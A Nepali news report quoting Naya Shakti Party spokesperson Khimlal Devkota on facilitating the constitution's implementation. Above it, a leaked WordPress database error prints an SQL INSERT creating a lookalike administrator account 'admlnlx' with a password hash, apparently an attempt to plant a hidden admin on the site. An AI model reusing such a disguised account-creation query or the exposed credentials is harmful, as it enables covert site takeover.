WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzhxgVfZTZHxQbb.n/fmmLlI6VsIrV.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 07:51:28', '', 'admlnlx', 'admlnlx')
म्याग्दी (बेनी),माघ १६ –
नयाँ शक्ति पार्टी नेपालका प्रवक्ता खिमलाल देवकोटाले आफ्नो पार्टीले संविधान कार्यान्वयनमा सहजकर्ताको भूमिका खेल्ने बताउनुभएको छ ।
आज म्याग्दीको बेनी पत्रकारसँग कुरा गर्दै उहाँले सरकारले संविधान संशोधन, चुनाव घोषणा र दलहरुबीच आपसी विश्वास जित्न पनि नसकिरहेको अहिलेको अवस्थामा नयाँ शक्ति पार्टीले सबै राजनीतिक दलबीच सहमतिका लागि सहजकर्ताको भूमिका खेल्ने बताउनुभएको छ ।
प्रवक्ता देवकोटाले विगत लामो समयपछि प्राप्त संविधानको कार्यान्वयन हुनुपर्नेमा जोड दिदैं नयाँ शक्तिको चाहना संविधान कार्यान्वयन होस् भन्ने रहेको स्पष्ट पार्नुभयो ।
प्रत्यक्ष निर्वाचित कार्यकारी प्रमुखको व्यवस्था नगरेसम्म मुलुकले सहज निकास पाउन नसक्ने बताउँदै उहाँले भन्नुभयो – “राजनीतिक व्यवस्थाका विरुद्ध सबैसँग लड्ने समय सकिएको छ, अव अवस्थाका विरुद्ध लड्नुपर्ने समय आएको छ ।” – रासस